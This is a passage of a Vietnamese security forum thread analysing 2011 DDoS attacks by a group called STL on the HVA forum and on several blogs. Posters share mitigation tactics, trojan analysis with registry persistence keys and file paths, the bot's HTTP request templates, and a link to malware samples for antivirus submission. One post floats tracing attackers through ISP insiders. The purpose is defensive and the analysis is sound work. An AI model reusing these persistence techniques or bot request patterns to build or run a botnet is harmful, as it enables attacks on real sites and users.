Bọn STL này là 1 nhóm code. vì vậy nhiều thằng code thối lắm. vì thế nên có đọc code cũng khó lắm mà biết được thằng nào code. không thể có được mấy chục % nhờ RCE code của bọn này. vì nếu tôi code 1 chương trình thế nào thì thằng bạn tôi học cùng thầy giáo cũng sẽ code gần giống thậm chí code giống như vậy, ngoài ra đa số STL đều lên mạng lấy code về đạo đạo, nên có thể thấy mấy thằng này không có tư duy, mà code theo kiểu chắp chắp vá vá như vá áo rách chứ không may hẳn từ đầu đến cuối 1 cái áo. Có thêm vụ có IP của STL nữa + thành viên của HVA rất đông, chắc chắn có người làm cho các ISP lớn nên chắc không khó để có chính xác thông tin của tài khoản đăng ký ADSL đó. từ đó cũng có thể lần ra được vô số. vì các thông tin cung cấp public trên đấy chỉ là 1 phần nhỏ, chứ không phải tất cả các thông tin mà các anh thu thập được đều post lên đây hết 
@phanledaivuong : cảm ơn anh nhìu vì đã cho em thêm ý kiến nha anh @eicar : hoan hô bạn, vì đã biết, và dám nhìn nhận và xin lỗi . mình tin bạn sẽ thành công. chúc bạn nhiều may mắn nha. ]]>
/hvaonline/posts/list/39641.html#245289 /hvaonline/posts/list/39641.html#245289 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. 1. Băng thông: Để giảm thiểu tình trạng bão hoà băng thông, HVA mở ra thêm 2 nhánh: Nhật và Đức. Cả hai nhánh này không cần CPU quá nhanh, memory quá nhiều mà chỉ cần băng thông tốt. Tổng cộng 3 nhánh của HVA có 2.1Gbit nhưng điều quan trọng là requests để "đốt" HVA bị chẻ ra do DNS round robin. Bởi vậy, chẳng khi nào có nhánh nào bị ngập lụt. Hơn nữa, để điều động một botnet thường xuyên có khả năng dội > 2Gbit là chuyện không đơn giản. Hiện nay, theo đo đạt thì botnet của stl nằm ở tầm 5Mbit vì khá nhiều zombies đã đi về cõi.. vĩnh hằng :-) . 2. Giới hạn requests: Tất cả những cú DDoS thông thường là trông chờ vào trường độ và cường độ. Trường độ thì khó kiểm soát vì zombies có thể bị shutdown bất cứ lúc nào (người dùng tắt máy chẳng hạn) nhưng cường độ thì có thể thực hiện bằng cách gởi càng nhiều requests càng nhanh thì càng tạo cường độ. Mặt tiêu cực của biện pháp trở nên hiển nhiên bởi vì những anh nào mà đập càng nhanh vô HVA thì càng đích thị là DDos ---> /dev/null. 3. Giới hạn crawling: Botnet của stl thích... bò =)) . Bởi vậy, chúng cứ nhè cái gì có đường dẫn là... bò. Cách triệt tiêu hành động bò này là làm sao cho chúng không thấy được đường dẫn. Có nhiều cách từ đơn giản đến phức tạp. Ví dụ, áp dụng biện pháp obsfucate links bằng nhiều cách. Bots của stl không thể là trình duyệt bình thường (nếu không thì kích thước của nó phải cả chục Mb và có đầy đủ mọi thứ như trình duyệt :P ) cho nên có những thứ bots không thể hiểu nổi. 4. Kiểm soát sessions: Bởi vì bots của stl "bò" cho nên chúng nhận được cookie ấn định cho session và bởi vậy, chúng có thể "bò" sâu vô trong. Nếu nhận ra chúng là dạng... "bò" thì invalidate ngay session của chúng thì chúng không bò được nữa. Nói một cách khác, đây là trường hợp "con gà và quả trứng", nếu chúng bò được thì chúng nhận được session cookie và nhận được session cookie thì chúng tiếp tục bò. Bởi vậy, chặn không cho bò thì không thể có cookie có giá trị (và cookie xạo thì chắc chắn không có giá trị rồi e.g. bài học xưa: fixation session cookie). 5. Tuning: Đây là phần tối quan trọng. Bất cứ mọi thứ từ nhỏ nhất tới lớn nhất đều phải đo đạc và tune tối đa. Từ kernel parameters cho đến từng giá trị trong cấu hình của dịch vụ web đều phải cân nhắc kỹ. Tất cả các giá trị "timeout" đều phải đồng bộ từ trên xuống dưới để tránh "ông đánh trống, bà thổi kèn" và tạo negative impact. Ngay cả những luật giới hạn requests cũng phải được theo dõi, phân tích và điều chỉnh để làm sao tránh tạo cản trở cho người dùng thật. 6. Tài nguyên: Cái này thì không thể thiếu được. Cho dù có làm gì đi chăng nữa mà CPU, memory, diskspace không đủ thì chỉ chờ đón... "cái chết đến chậm" :-) . Đầu tháng 8, có lần stl chơi trò rỉ rả mà tạo gần 90 ngàn sessions (y hệt như 90 ngàn thành viên và khách đang viếng diễn đàn). Trước đó, application server không có đủ memory assigment, không đủ threads cho nên lên tới chừng quá 10 ngàn là ngỏm củ tỏi. Tài nguyên cần ấn định cho hợp lý và thậm chí thứa sức để chịu đựng nếu như vòng phòng thủ bị lủng lổ :-) . Già sử mỗi session cần 10k real memory thì application server phải có ít nhất là 1Gb Ram để phục vụ cho 100 ngàn sessions. Cứ vậy mà tính lên. Ngoài ra, backend database cần phải đủ tài nguyên, đủ connections để phục vụ. Cái gì cache được thì cache, cái gì không cache được thì delay công tác "COMMIT" vào database để giảm thiểu CSDL bị dập. Không đủ tài nguyên thì phải nâng cấp. Nói chung, chống DDoS là công tác kiện toàn bảo mật nghiêng hẳn về phía optimisation và tunning. Một website được xây chỉ để "chạy được" nhưng chưa "chạy tốt" thì sẽ chết trong tích tắc. Một website "chạy tốt" thì sống lâu hơn nhưng cũng sẽ chết. Một website chạy cực tốt thì cầm cự lâu hơn để quản trị có đủ thời gian phân tích và đối phó. ]]> /hvaonline/posts/list/39641.html#245290 /hvaonline/posts/list/39641.html#245290 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?tz745o0f678w8. Các bạn sort theo date, down các mẫu mới về rồi gởi mẫu lên các AV. Càng nhiều người tham gia gởi mẫu thì khả năng virus của stl bi detect là clean (sạch) sẽ càng thấp. 2. Nếu các AV chưa cập nhật và phát hiện ra, các bạn có thể tự tìm diệt bằng tay. Chỉ cần một bộ tool: SysInternalsSuite và Gmer, chép lên USB là các bạn có thể dể dàng diệt đám "mèo què" này rồi. Rất dể diệt: kill hay suspend process EXE của nó, xoá, run AutoRuns để xoá, dọn dẹp registry. Các bạn tìm và diệt trên máy các bạn, máy trong gia đình, trường học, cơ quan các bạn. Đồng thời phổ biến rộng rãi tới mọi người quen, mọi người trong cơ quan, trường học các bạn, bằng mail, Facebook, forum, blog... 3. Và quan trọng, làm sao cho mấy cái website còn sống ngáp ngáp của stl như speed.cyline.org, map.priper.info đi die luôn. Các bạn cùng nhau submit các địa chỉ chứa virus đó như là bad link cho Google, McAfeee.... bất cứ tổ chức nào mà các bạn biết. Càng nhiều người report thì khả năng các website, các host đó chết càng cao. Các bạn đừng nghĩ đây chỉ là vấn đề của HVA với stl. Tụi này đang ddos Vietnamnet, ddos danlambaovn và một loạt các blog khác. Nếu không tiêu diệt nó, tới ngày nào đó, tụi nó thống trị Internet VN ta, và các bạn sẽ là zombies cho tụi nó site khiến, máy tính của các bạn không còn là của bạn nữa, mọi hành động trên máy của các bạn tui nó sẽ nắm hết, website của các bạn sẽ bị ddos bất kỳ lúc nào tụi nó muốn, chỉ mất tầm 15 phút thay đổi file config để đặt link tới website của các bạn là xong, website của các bạn đi luôn. Các bạn nên nhận thức được tầm nguy hiểm của nhóm stl này. Mọi người đều có thể là nạn nhân của stl. Vd như tôi đây, hồi xưa do xỉn xỉn, sương sương và sơ hở trong lúc rce mẫu của tụi nó, bị mất hết pass google, yahoo, pass và id của 3 tài khoản ở ngân hàng, bị tụi nó bêu xấu chính trên blog của mình, rồi dùng chính nick của tôi chat tầm bậy tầm bạ với các bạn khác, vu khống tôi, còn lên HVA post bậy bạ. Tức trên trình duyệ của tôi (và cũng sẽ của các bạn) có lưu username và pwd nào, tụi nó đều có hết. Tới bây giờ, ngồi viết lại mà còn tức, chỉ khi nào có thằng stl nào vào đây công khai xin lỗi tôi và HVA thì mới thôi.. Tôi chỉ là một nạn nhân nhỏ của stl, không sao cả, mất pass, mail, blog rồi vẫn lấy lại được hết, nhưng còn biết bao nhiêu người bị tụi nó "bạch hoá" hèn hạ, xấu xa, bị làm nhục, đời tư, cá nhân, gia đình bị bôi xấu, bêu riếu khắp Internet, bị hăm doạ. Các bài viết tâm huyết, trăn trở của họ viết trên blog của họ, của nạn nhân khác bị xoá hết, bị chiếm blog.... Nếu các bạn ở trường hợp như họ, các bạn có căm tức không ? Vài lời chân thành và mong mọi người tiếp tục tham gia ! Chúng ta thấp cổ bé miệng, không có quyền lực gì như các ISP, các tổ chức "nổ" trong nước, pháp luật thì làm ngơ, báo chí thì chắc có lẽ bị cấm đăng tin... nhưng đoàn kết lại, chúng ta sẽ mạnh hơn nhiều và thừa sức tiêu diệt được cái team xấu xa stl, muốn làm "minh chủ Internet lâm" :-) mọi người dân Việt Nam ta. PS: Lâu rồi mới viết nghiêm túc như vậy, cà rỡn quen rồi ;)]]> /hvaonline/posts/list/39641.html#245292 /hvaonline/posts/list/39641.html#245292 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245293 /hvaonline/posts/list/39641.html#245293 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245296 /hvaonline/posts/list/39641.html#245296 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
@conmale Có 1 vấn đề này em hay bị mắc phải khi truy cập vào / ( tab 1 ) click vào Forum nó sẽ nhảy ra cái /tof/ ở 1 new tab mới ( tab 2 ) . Nhưng khi em tắt cái ( tab 2 ) rồi click vào cái link forum ở ( tab 1 ) thì nó lại trả về /null. Phải tắt trình duyệt đi mở lại mới vào được. 
Hì hì, vậy thì đừng tắt tab2 mà chỉ tắt tab1 và cứ thế mà dùng. Tắt tab2 và trở lại tab1 để click thì "nó" nghĩ đó là zombie cho nên nó "null" liền. Logic nằm ở chỗ đi theo từ tab1 đến tab2 và dùng tab2 chớ không ai đi ngược lại hết.]]>
/hvaonline/posts/list/39641.html#245298 /hvaonline/posts/list/39641.html#245298 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. SbieMgm.dll và SbieSvc.exe 1. http://danlambaovn.blogspot.com 2. http://www.aihuuphuyen.org 3. http://nguoiduatinkami.wordpress.com 4. http://vrvradio.com 5. http://aotrangoi.com 6. http://viettan.org 7. http://dangviettan.wordpress.com 8. http://radiochantroimoi.com 9. http://radiochantroimoi.wordpress.com Ở trên là config của backgrounds.jpg, còn showthread.php thì hơi khác một chút, tập trung chính vào danlambao: Code:
GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive
 http://danlambaovn.blogspot.com

GET /favicon.ico HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: image/png,image/*;q=0.8,*/*;q=0.5\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive
 http://danlambaovn.blogspot.com
/favicon.ico

GET /2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nReferer: http://danlambaovn.blogspot.com/
 http://danlambaovn.blogspot.com
/2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html

GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nIf-Modified-Since: Thu, 11 Aug 2011 <(TAG{ 10 23}/TAG)>:<(TAG{ 10 50}/TAG)>:<(TAG{ 20 59}/TAG)> GMT\r\nIf-None-Match: "<(TAG{ 4 ------}/TAG)>-<(TAG{ 1341 5352}/TAG)>-<(TAG{ 2 ------}/TAG)>-<(TAG{ 3521 8953}/TAG)>-<(TAG{ 6 ------}/TAG)>"\r\nReferer: http://danlambaovn.blogspot.com/2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html
 http://danlambaovn.blogspot.com
Dù không liên quan tới HVA chúng ta nhưng hành động ddos thì không thể chấp nhận được. Mong các bạn phổ biến, tìm diệt 2 file kể trên.]]>
/hvaonline/posts/list/39641.html#245300 /hvaonline/posts/list/39641.html#245300 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Tới sáng nay, stl vẫn dai dẵng ddos vào các site, blog sau, dùng hai thằng bot nằm vùng SbieMgm.dll và SbieSvc.exe 1. http://danlambaovn.blogspot.com 2. http://www.aihuuphuyen.org 3. http://nguoiduatinkami.wordpress.com 4. http://vrvradio.com 5. http://aotrangoi.com 6. http://viettan.org 7. http://dangviettan.wordpress.com 8. http://radiochantroimoi.com 9. http://radiochantroimoi.wordpress.com Ở trên là config của backgrounds.jpg, còn showthread.php thì hơi khác một chút, tập trung chính vào danlambao: Code:
GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive
 http://danlambaovn.blogspot.com

GET /favicon.ico HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: image/png,image/*;q=0.8,*/*;q=0.5\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive
 http://danlambaovn.blogspot.com
/favicon.ico

GET /2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nReferer: http://danlambaovn.blogspot.com/
 http://danlambaovn.blogspot.com
/2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html

GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nIf-Modified-Since: Thu, 11 Aug 2011 <(TAG{ 10 23}/TAG)>:<(TAG{ 10 50}/TAG)>:<(TAG{ 20 59}/TAG)> GMT\r\nIf-None-Match: "<(TAG{ 4 ------}/TAG)>-<(TAG{ 1341 5352}/TAG)>-<(TAG{ 2 ------}/TAG)>-<(TAG{ 3521 8953}/TAG)>-<(TAG{ 6 ------}/TAG)>"\r\nReferer: http://danlambaovn.blogspot.com/2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html
 http://danlambaovn.blogspot.com
Dù không liên quan tới HVA chúng ta nhưng hành động ddos thì không thể chấp nhận được. Mong các bạn phổ biến, tìm diệt 2 file kể trên. 
Tự hỏi danlambao là xài blogspot là hàng của google? không hiểu tụi Sờ Ti Lợn này cũng có óc lợn luôn hay sao. DDoS nó khác gì DDoS google. mà với lượng bot như anh conmale nói là 5Mbps thì sao có thể cho danlambao die được]]>
/hvaonline/posts/list/39641.html#245302 /hvaonline/posts/list/39641.html#245302 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245303 /hvaonline/posts/list/39641.html#245303 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245305 /hvaonline/posts/list/39641.html#245305 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Có một khía cạnh đơn giản nhưng quan trọng có lẽ nên đề cập đó là quá trình biến máy con thành zombie của "AcrobatUpdater.exe". Trong suốt quá trình nhiễm này, có hai tiểu đoạn: 1. Tạo ra: C:\Program Files\Adobe\Updater6 [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe 2. Điều chỉnh registry: - Với key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ CURRENT ], New Value: [ 2011-07-20 16:28:52 ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ DATA ], New Value: [ 0x5d4c3c3d3f4b572501120204081e0371454349440e5f514c24484d550e13 ] Nếu người dùng chỉ là "standard user" chớ chẳng phải là user với chủ quyền "administrator" thì hai động tác trên không thể xảy ra được. Trên Windows 7 càng khó hơn vì càng không thể "silently" thực thi việc này. Bởi vậy, với tổng cộng gần 100 ngàn IP tấn công HVA mấy ngày vừa qua (số lượng máy con thật sự đằng sau các IP này có lẽ còn nhiều hơn rất nhiều) toàn là những máy con chạy với chủ quyền "Administrator". Đây là sự thật đáng sợ. Cho dùng Windows 7 có bảo mật như thế nào đi chăng nữa mà người dùng sử dụng máy với account có chủ quyền cao nhất thì coi như tính bảo mật của Windows 7 cũng bỏ đi. Vấn đề được đặt ra, tại sao người dùng dễ dàng tải exe từ những nguồn nào đó không phải từ trang chính thức của Adobe? Hãy gác qua chuyện tạo máy con làm zombies để DDoS mà hãy hình dung xem, hàng trăm ngàn máy con bị điều khiển, bị đánh cắp thông tin (có thể có cả những máy có thông tin quan trọng bởi vì trong danh sách IP tấn công HVA có cả những IP thuộc các ban ngành của chính phủ). Liệu đây là chuyện có thể xem nhẹ và làm ngơ? 

conmale wrote:

PXMMRF wrote:
Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.  
Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN. Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" :P . 
Có lẽ anh conmale nhầm ở điểm nào đó, STL bot chạy và hoạt động không cần quyền Administrator ở Windows XP.]]>
/hvaonline/posts/list/39641.html#245308 /hvaonline/posts/list/39641.html#245308 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:

conmale wrote:
Có một khía cạnh đơn giản nhưng quan trọng có lẽ nên đề cập đó là quá trình biến máy con thành zombie của "AcrobatUpdater.exe". Trong suốt quá trình nhiễm này, có hai tiểu đoạn: 1. Tạo ra: C:\Program Files\Adobe\Updater6 [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe 2. Điều chỉnh registry: - Với key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ CURRENT ], New Value: [ 2011-07-20 16:28:52 ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ DATA ], New Value: [ 0x5d4c3c3d3f4b572501120204081e0371454349440e5f514c24484d550e13 ] Nếu người dùng chỉ là "standard user" chớ chẳng phải là user với chủ quyền "administrator" thì hai động tác trên không thể xảy ra được. Trên Windows 7 càng khó hơn vì càng không thể "silently" thực thi việc này. Bởi vậy, với tổng cộng gần 100 ngàn IP tấn công HVA mấy ngày vừa qua (số lượng máy con thật sự đằng sau các IP này có lẽ còn nhiều hơn rất nhiều) toàn là những máy con chạy với chủ quyền "Administrator". Đây là sự thật đáng sợ. Cho dùng Windows 7 có bảo mật như thế nào đi chăng nữa mà người dùng sử dụng máy với account có chủ quyền cao nhất thì coi như tính bảo mật của Windows 7 cũng bỏ đi. Vấn đề được đặt ra, tại sao người dùng dễ dàng tải exe từ những nguồn nào đó không phải từ trang chính thức của Adobe? Hãy gác qua chuyện tạo máy con làm zombies để DDoS mà hãy hình dung xem, hàng trăm ngàn máy con bị điều khiển, bị đánh cắp thông tin (có thể có cả những máy có thông tin quan trọng bởi vì trong danh sách IP tấn công HVA có cả những IP thuộc các ban ngành của chính phủ). Liệu đây là chuyện có thể xem nhẹ và làm ngơ? 

conmale wrote:

PXMMRF wrote:
Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.  
Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN. Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" :P . 
Có lẽ anh conmale nhầm ở điểm nào đó, STL bot chạy và hoạt động không cần quyền Administrator ở Windows XP. 
Anh thử ngay trên máy chạy XP ở nhà với quyền user bình thường. STL malware hoàn toàn không thể chỉnh registry, không thể hoàn tất quá trình.. nhiễm được.]]>
/hvaonline/posts/list/39641.html#245311 /hvaonline/posts/list/39641.html#245311 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245319 /hvaonline/posts/list/39641.html#245319 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) . 
Đoạn viết trên của tôi mà bolzano_1989 trích ra, có thể gây hiểu nhầm. Vì sau khi anh conmale có ý kiến nhận đinh. Ý kiến này cũng đã được bolzano_1989 trích ra sau đó (như thấy ở trên), thì tôi đã có ý kiến giải thích ngay, như sau:

PXMMRF tai trang 7 topic nay wrote:
Hì hì, câu này mình nói với ý khác. Vì axasin thông báo là cài cái Malicious Unikey mà bạn ấy download về chỉ tạo các file virus MSHelpCenter.* trong Windows 7 thôi , còn trong Win XP thì không được (nghĩa là Win XP thì không bị nhiễm virus khi cài malicious Unikey nói trên). Vì số người ở VN dùng Win 7 còn ít, nên tôi suy diễn tiếp theo ý axasin như vậy (cũng có ý giỡn vui với rang0 chút chút) Đây là suy diễn theo nhận định của axasin. Chứ tôi đương nhiên là không nghĩ như vậy. Tôi nghĩ máy trên mạng VN hầu hết là cài Win XP và tỷ lệ máy cài Win XP bị nhiễm STL virus-trojan là rất cao. Cần nói thêm là hiện đang có nhiều loại (version) malicious Unikey và Vietkey trên mạng. Malicious Unikey mà axasin cài khác với của lequi đã cài. Còn có nhiều malicious Unikey khác trên mang nũa. Kinh!  
]]>
/hvaonline/posts/list/39641.html#245323 /hvaonline/posts/list/39641.html#245323 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) . Có lẽ anh format ổ đĩa với NTFS format ? 
Đúng rồi. Máy anh chạy XP có ổ đĩa NTFS. Mọi thứ default, chưa hề set cái gì trong policies hết. Anh vừa thử lại, chắc chắn không thực hiện được các công đoạn lan nhiễm của stl malware.]]>
/hvaonline/posts/list/39641.html#245324 /hvaonline/posts/list/39641.html#245324 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

bolzano_1989 wrote:
Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) . Có lẽ anh format ổ đĩa với NTFS format ? 
Đúng rồi. Máy anh chạy XP có ổ đĩa NTFS. Mọi thứ default, chưa hề set cái gì trong policies hết. Anh vừa thử lại, chắc chắn không thực hiện được các công đoạn lan nhiễm của stl malware. 
Khi format ổ đĩa với file system FAT 32 hay với cà NTFS, cài Win XP và không config. lai "local policies" (trong Computer Management----> Local policies---->Security Options) thì dù chạy máy với account limited, có thể vẫn bị nhiễm STL virus. Cái khái niệm "limited right" trong XP khá mơ hồ và chẳng có user thông thường nào biết chuyện config. lại "local policies". Ngay cả chúng ta, muốn config kỹ và toàn bộ khoảng trên dưới 50 mục trong Security Options cho thật chuẩn, thì cũng không dễ dàng gì. Hì hì. Tính bảo mật cao của NTFS dường như chỉ phát huy trong Win 2K và Win 2K3 (Win 2k8 thì đương nhiên rồi). Ngay việc phân chia account và xác đinh quyền cho từng loại account trong Win 2K Pro, Win 2K3 cũng kỹ và hay hơn Win XP nhiều. Điều này tôi cũng đã viết trong một post trong topic này ]]>
/hvaonline/posts/list/39641.html#245327 /hvaonline/posts/list/39641.html#245327 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

bolzano_1989 wrote:
Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) . Có lẽ anh format ổ đĩa với NTFS format ? 
Đúng rồi. Máy anh chạy XP có ổ đĩa NTFS. Mọi thứ default, chưa hề set cái gì trong policies hết. Anh vừa thử lại, chắc chắn không thực hiện được các công đoạn lan nhiễm của stl malware. 
Virus của STL ở máy em đề cập được khởi động mỗi khi mở máy tính bằng cách tạo giá trị SbieSvc trong khoá Run của HKCU (HKEY_CURRENT_USER) registry hive (ta không cần quyền Administrator mà chỉ cần quyền của Limited account để ghi vào khóa này): HKCU\Software\Microsoft\Windows\CurrentVersion\Run SbieSvc (Sandboxie Service) Publisher: (Not verified) tzuk %userprofile%\application data\sandboxie\sbiesvc.exe]]>
/hvaonline/posts/list/39641.html#245335 /hvaonline/posts/list/39641.html#245335 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245336 /hvaonline/posts/list/39641.html#245336 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:

conmale wrote:

bolzano_1989 wrote:
Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) . Có lẽ anh format ổ đĩa với NTFS format ? 
Đúng rồi. Máy anh chạy XP có ổ đĩa NTFS. Mọi thứ default, chưa hề set cái gì trong policies hết. Anh vừa thử lại, chắc chắn không thực hiện được các công đoạn lan nhiễm của stl malware. 
Virus của STL ở máy em đề cập được khởi động mỗi khi mở máy tính bằng cách tạo giá trị SbieSvc trong khoá Run của HKCU (HKEY_CURRENT_USER) registry hive (ta không cần quyền Administrator mà chỉ cần quyền của Limited account để ghi vào khóa này): HKCU\Software\Microsoft\Windows\CurrentVersion\Run SbieSvc (Sandboxie Service) Publisher: (Not verified) tzuk %userprofile%\application data\sandboxie\sbiesvc.exe 
Malware của stl khi anh chạy thử là trên Windows XP SP3, đĩa NTFS và anh ghi nhận được nó bị dừng lại khi thực hiện công tác chép AcrobatUpdater.exe vô trong C:\Program Files\Adobe\. Nếu anh thử chạy bằng administrator account, nó thực hiện tuồn tuột hết kể cả ghi cái này vô registry: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] ]]>
/hvaonline/posts/list/39641.html#245341 /hvaonline/posts/list/39641.html#245341 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

mv1098 wrote:
